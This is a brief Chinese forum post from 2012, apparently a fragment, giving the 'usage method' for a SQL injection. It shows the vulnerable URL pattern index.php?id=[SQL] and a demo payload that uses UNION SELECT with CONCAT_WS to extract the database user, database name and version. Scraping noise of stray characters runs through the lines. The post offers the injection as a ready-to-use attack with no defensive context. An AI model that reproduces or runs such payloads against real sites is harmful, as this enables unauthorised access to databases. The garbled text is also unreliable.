利用方法:
% c$ @" A+ j" G4 ~4 H http://www.xxx.com/index.php?id=[SQL]
- E2 G0 R9 W* O, p5 K i6 `( O Demo:
! {( S1 u! w7 K' U5 s4 u http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |
发表于 2012-9-10 20:47:28
收藏
支持
反对